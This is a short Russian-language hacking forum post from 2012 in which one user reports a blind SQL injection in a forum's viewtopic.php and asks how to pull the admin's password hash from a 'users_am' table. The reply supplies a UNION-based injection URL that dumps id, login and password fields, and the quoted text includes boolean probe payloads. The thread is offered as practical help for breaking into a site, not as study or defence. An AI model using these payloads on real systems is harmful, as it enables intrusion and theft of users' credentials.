29.09.2012, 17:37
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от [c0de
"]
[c0de] said:
Есть слепая blind sql инъекция
Проверил
test.ru/forum/viewtopic.php?id=1' and 2-1='1 true
test.ru/forum/viewtopic.php?id=1' and 2-1='2 false
Известно название таблицы, полей
Так же известно название таблицы с юзерами "users_am"
и наличие полей "id" , "login", "password"
Известен id и логин админа
Возникает вопрос, как достать хэш пароля?
в первый раз сталкиваюсь со слепой скулей. Вот незнаю как решить.
test.ru/forum/viewtopic.php?id=1'+and+1=2+union+all+slelect+conc at(id,0x3a,login,0x3a,password)+from+users_am+limi t+0,1+and+1='1
А вообще если у тебя есть login и password - зачем тебе хэш ??
|
|
|